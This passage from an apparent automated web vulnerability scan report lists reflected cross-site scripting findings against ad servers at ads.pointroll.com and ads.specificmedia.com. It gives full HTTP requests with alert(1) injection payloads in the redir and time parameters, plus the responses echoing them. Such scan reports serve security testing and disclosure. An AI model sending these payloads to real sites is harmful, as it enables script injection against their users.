PRpc=|FYnnGK5Q:1|FOO8GJTu:1|FZt1GMjB:1|FZt2GMjA:1|FZt3GMSn:1|FWcMGLLp:1|FW9qGLZC:2|FW9nGLZC:2|FKqEGKwo:2|FWcLGLLp:1|FZsHGMjB:1|FYnlGMEZ:1|FYnmGMEa:1|FVn1GLEi:58|FVnSGLEl:59|FVnTGLEo:59|FVnVGLEp:59|FVnUGLEm:59|FWauGKw2:1|FW9sGLZE:1|FW9lGLZE:1|FY3gGMGQ:1|FW9rGLZC:3|FW9UGLZE:2|FW9TGLZD:3|FW9UGLZB:2|FOLxGJTv:1|FOLwGJTs:1|FPoFGKTE:1|FPoFGKTL:1|EvizFzvF:1|FLXeGHhF:1|FLW9GHhF:1|FODiGJQB:1|FUZrGKwB:1|FUZrGKvy:1|FOn5GJsu:1|EtxzGA7A:1|FPLNGKDl:1|FO2mGJij:1|FCbKGDVY:1|FPLNGKCp:1|EoxlFy9A:1|#

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 11 May 2011 15:34:50 GMT
Server: Microsoft-IIS/6.0
P3P: CP="NOI DSP COR PSAo PSDo OUR BUS OTC"
Cache-Control: no-cache

location.replace('http://www.medicinenet.com/pointroll/prs.htm?pid=1275567D53920110419140505&redir=http://mpc.mxptint.net/1S1SEA5BB36FS0S8FS5B5S1S12CSFAS53SB18_20CAAFAA_106E834%3F$CTURL$&time=3|10:0|-5&flash=10ab177';alert(1)//f0013846b20&server=portalserve&bu=1917819888');

5.98. http://ads.pointroll.com/PortalServe/ [redir parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ads.pointroll.com
Path:   /PortalServe/

Issue detail

The value of the redir request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b0349'-alert(1)-'f651f34bdd0 was submitted in the redir parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /PortalServe/?pid=1275567D53920110419140505&flash=10&time=3|10:0|-5&redir=http://mpc.mxptint.net/1S1SEA5BB36FS0S8FS5B5S1S12CSFAS53SB18_20CAAFAA_106E834%3f$CTURL$b0349'-alert(1)-'f651f34bdd0&pos=x&dom=http://www.medicinenet.com&r=0.7241260474547744 HTTP/1.1
Host: ads.pointroll.com
Proxy-Connection: keep-alive
Referer: http://as.webmd.com/html.ng/transactionID=6344371306205&tile=6344371306205&xpg=4294&sec=8000&artid=446&site=2&affiliate=22&uri=subject%3Dpink_eye&pos=121
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PRID=B313D3CD-2147-4ACC-A03C-CCA65D06F94D; PRbu=EoSNMBpPq; PRsl=11042210442417319321424330526S; PRvt=CGJBaEoSNMBpPqAI5BBeJUpEoeWZPXI2ARGCAeJo2EouvAb7yDAEECAeJozEovALEa7O!E7BCeJpJEotn9OvPEAzwCAeJjUEotmZjrmKAEcCDe; PRgo=BCBAAsJvCAAuILDBF-19!BCVBF4FRDVCFUE6; PRimp=F0A20400-110B-CEAE-1309-A330013B0102; PRca=|AKLC*1774:2|AKTy*9203:2|AKRD*2017:4|AKQh*130:3|AKQf*282:294|AKTa*130:1|AKVY*127:1|AKQk*1753:16|AKPE*832:3|AKN6*527:2|AJvt*77:1|AKDp*36:2|AKOh*27:1|AKRt*47:2|AKOA*1753:1|AJsL*1753:1|AKGw*2017:1|AJvr*1753:1|AKLp*1753:2|AJcC*23172:1|#; PRcp=|AKPEAADS:1|AKRDAJme:3|AKLCAA2c:2|AKTyACY1:2|AKRDAA67:1|AKQhAACG:3|AKQfAAE8:294|AKTaAACG:1|AKQkAFiH:5|AKVYAACD:1|AKQkAFx5:4|AKQkAA2R:7|AKPEAAN0:2|AKN6AAI5:2|AJvtAABP:1|AKDpAAAa:2|AKOhAAA1:1|AKRtAAAl:2|AKOAAA2R:1|AJsLAA2R:1|AKGwAA67:1|AJvrAA2R:1|AKLpAA2R:2|AJcCAGBk:1|#; PRpl=|FYnn:1|FOO8:1|FZt1:1|FZt2:1|FZt3:1|FWcM:1|FW9q:2|FW9n:2|FKqE:2|FWcL:1|FZsH:1|FYnl:1|FYnm:1|FVn1:58|FVnS:59|FVnT:59|FVnV:59|FVnU:59|FWau:1|FW9s:1|FW9l:1|FY3g:1|FW9r:3|FW9T:3|FW9U:4|FOLx:1|FOLw:1|FPoF:2|Eviz:1|FLXe:1|FLW9:1|FODi:1|FUZr:2|FOn5:1|Etxz:1|FO2m:1|FCbK:1|FPLN:2|Eoxl:1|#; PRcr=|GK5Q:1|GJTu:1|GMjA:1|GMSn:1|GKwo:2|GLLp:2|GMjB:2|GMEZ:1|GMEa:1|GLEi:58|GLEl:59|GLEo:59|GLEp:59|GLEm:59|GKw2:1|GMGQ:1|GLZC:7|GLZE:4|GLZD:3|GLZB:2|GJTv:1|GJTs:1|GKTE:1|GKTL:1|FzvF:1|GHhF:2|GJQB:1|GKwB:1|GKvy:1|GJsu:1|GA7A:1|GKDl:1|GJij:1|GDVY:1|GKCp:1|Fy9A:1|#; PRpc=|FYnnGK5Q:1|FOO8GJTu:1|FZt1GMjB:1|FZt2GMjA:1|FZt3GMSn:1|FWcMGLLp:1|FW9qGLZC:2|FW9nGLZC:2|FKqEGKwo:2|FWcLGLLp:1|FZsHGMjB:1|FYnlGMEZ:1|FYnmGMEa:1|FVn1GLEi:58|FVnSGLEl:59|FVnTGLEo:59|FVnVGLEp:59|FVnUGLEm:59|FWauGKw2:1|FW9sGLZE:1|FW9lGLZE:1|FY3gGMGQ:1|FW9rGLZC:3|FW9UGLZE:2|FW9TGLZD:3|FW9UGLZB:2|FOLxGJTv:1|FOLwGJTs:1|FPoFGKTE:1|FPoFGKTL:1|EvizFzvF:1|FLXeGHhF:1|FLW9GHhF:1|FODiGJQB:1|FUZrGKwB:1|FUZrGKvy:1|FOn5GJsu:1|EtxzGA7A:1|FPLNGKDl:1|FO2mGJij:1|FCbKGDVY:1|FPLNGKCp:1|EoxlFy9A:1|#

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 11 May 2011 15:34:54 GMT
Server: Microsoft-IIS/6.0
P3P: CP="NOI DSP COR PSAo PSDo OUR BUS OTC"
Cache-Control: no-cache

location.replace('http://www.medicinenet.com/pointroll/prs.htm?pid=1275567D53920110419140505&redir=http://mpc.mxptint.net/1S1SEA5BB36FS0S8FS5B5S1S12CSFAS53SB18_20CAAFAA_106E834%3F$CTURL$b0349'-alert(1)-'f651f34bdd0&time=3|10:0|-5&flash=10&server=portalserve&bu=1226325033');

5.99. http://ads.pointroll.com/PortalServe/ [time parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ads.pointroll.com
Path:   /PortalServe/

Issue detail

The value of the time request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a5861'%3balert(1)//763d8f4de0f was submitted in the time parameter. This input was echoed as a5861';alert(1)//763d8f4de0f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /PortalServe/?pid=1275567D53920110419140505&flash=10&time=3|10:0|-5a5861'%3balert(1)//763d8f4de0f&redir=http://mpc.mxptint.net/1S1SEA5BB36FS0S8FS5B5S1S12CSFAS53SB18_20CAAFAA_106E834%3f$CTURL$&pos=x&dom=http://www.medicinenet.com&r=0.7241260474547744 HTTP/1.1
Host: ads.pointroll.com
Proxy-Connection: keep-alive
Referer: http://as.webmd.com/html.ng/transactionID=6344371306205&tile=6344371306205&xpg=4294&sec=8000&artid=446&site=2&affiliate=22&uri=subject%3Dpink_eye&pos=121
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PRID=B313D3CD-2147-4ACC-A03C-CCA65D06F94D; PRbu=EoSNMBpPq; PRsl=11042210442417319321424330526S; PRvt=CGJBaEoSNMBpPqAI5BBeJUpEoeWZPXI2ARGCAeJo2EouvAb7yDAEECAeJozEovALEa7O!E7BCeJpJEotn9OvPEAzwCAeJjUEotmZjrmKAEcCDe; PRgo=BCBAAsJvCAAuILDBF-19!BCVBF4FRDVCFUE6; PRimp=F0A20400-110B-CEAE-1309-A330013B0102; PRca=|AKLC*1774:2|AKTy*9203:2|AKRD*2017:4|AKQh*130:3|AKQf*282:294|AKTa*130:1|AKVY*127:1|AKQk*1753:16|AKPE*832:3|AKN6*527:2|AJvt*77:1|AKDp*36:2|AKOh*27:1|AKRt*47:2|AKOA*1753:1|AJsL*1753:1|AKGw*2017:1|AJvr*1753:1|AKLp*1753:2|AJcC*23172:1|#; PRcp=|AKPEAADS:1|AKRDAJme:3|AKLCAA2c:2|AKTyACY1:2|AKRDAA67:1|AKQhAACG:3|AKQfAAE8:294|AKTaAACG:1|AKQkAFiH:5|AKVYAACD:1|AKQkAFx5:4|AKQkAA2R:7|AKPEAAN0:2|AKN6AAI5:2|AJvtAABP:1|AKDpAAAa:2|AKOhAAA1:1|AKRtAAAl:2|AKOAAA2R:1|AJsLAA2R:1|AKGwAA67:1|AJvrAA2R:1|AKLpAA2R:2|AJcCAGBk:1|#; PRpl=|FYnn:1|FOO8:1|FZt1:1|FZt2:1|FZt3:1|FWcM:1|FW9q:2|FW9n:2|FKqE:2|FWcL:1|FZsH:1|FYnl:1|FYnm:1|FVn1:58|FVnS:59|FVnT:59|FVnV:59|FVnU:59|FWau:1|FW9s:1|FW9l:1|FY3g:1|FW9r:3|FW9T:3|FW9U:4|FOLx:1|FOLw:1|FPoF:2|Eviz:1|FLXe:1|FLW9:1|FODi:1|FUZr:2|FOn5:1|Etxz:1|FO2m:1|FCbK:1|FPLN:2|Eoxl:1|#; PRcr=|GK5Q:1|GJTu:1|GMjA:1|GMSn:1|GKwo:2|GLLp:2|GMjB:2|GMEZ:1|GMEa:1|GLEi:58|GLEl:59|GLEo:59|GLEp:59|GLEm:59|GKw2:1|GMGQ:1|GLZC:7|GLZE:4|GLZD:3|GLZB:2|GJTv:1|GJTs:1|GKTE:1|GKTL:1|FzvF:1|GHhF:2|GJQB:1|GKwB:1|GKvy:1|GJsu:1|GA7A:1|GKDl:1|GJij:1|GDVY:1|GKCp:1|Fy9A:1|#; PRpc=|FYnnGK5Q:1|FOO8GJTu:1|FZt1GMjB:1|FZt2GMjA:1|FZt3GMSn:1|FWcMGLLp:1|FW9qGLZC:2|FW9nGLZC:2|FKqEGKwo:2|FWcLGLLp:1|FZsHGMjB:1|FYnlGMEZ:1|FYnmGMEa:1|FVn1GLEi:58|FVnSGLEl:59|FVnTGLEo:59|FVnVGLEp:59|FVnUGLEm:59|FWauGKw2:1|FW9sGLZE:1|FW9lGLZE:1|FY3gGMGQ:1|FW9rGLZC:3|FW9UGLZE:2|FW9TGLZD:3|FW9UGLZB:2|FOLxGJTv:1|FOLwGJTs:1|FPoFGKTE:1|FPoFGKTL:1|EvizFzvF:1|FLXeGHhF:1|FLW9GHhF:1|FODiGJQB:1|FUZrGKwB:1|FUZrGKvy:1|FOn5GJsu:1|EtxzGA7A:1|FPLNGKDl:1|FO2mGJij:1|FCbKGDVY:1|FPLNGKCp:1|EoxlFy9A:1|#

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 11 May 2011 15:34:52 GMT
Server: Microsoft-IIS/6.0
P3P: CP="NOI DSP COR PSAo PSDo OUR BUS OTC"
Cache-Control: no-cache

location.replace('http://www.medicinenet.com/pointroll/prs.htm?pid=1275567D53920110419140505&redir=http://mpc.mxptint.net/1S1SEA5BB36FS0S8FS5B5S1S12CSFAS53SB18_20CAAFAA_106E834%3F$CTURL$&time=3|10:0|-5a5861';alert(1)//763d8f4de0f&flash=10&server=portalserve&bu=2223917969');

5.100. http://ads.specificmedia.com/serve/v=5 [m parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ads.specificmedia.com
Path:   /serve/v=5

Issue detail

The value of the m request parameter is copied into a JavaScript string which is encapsulated in si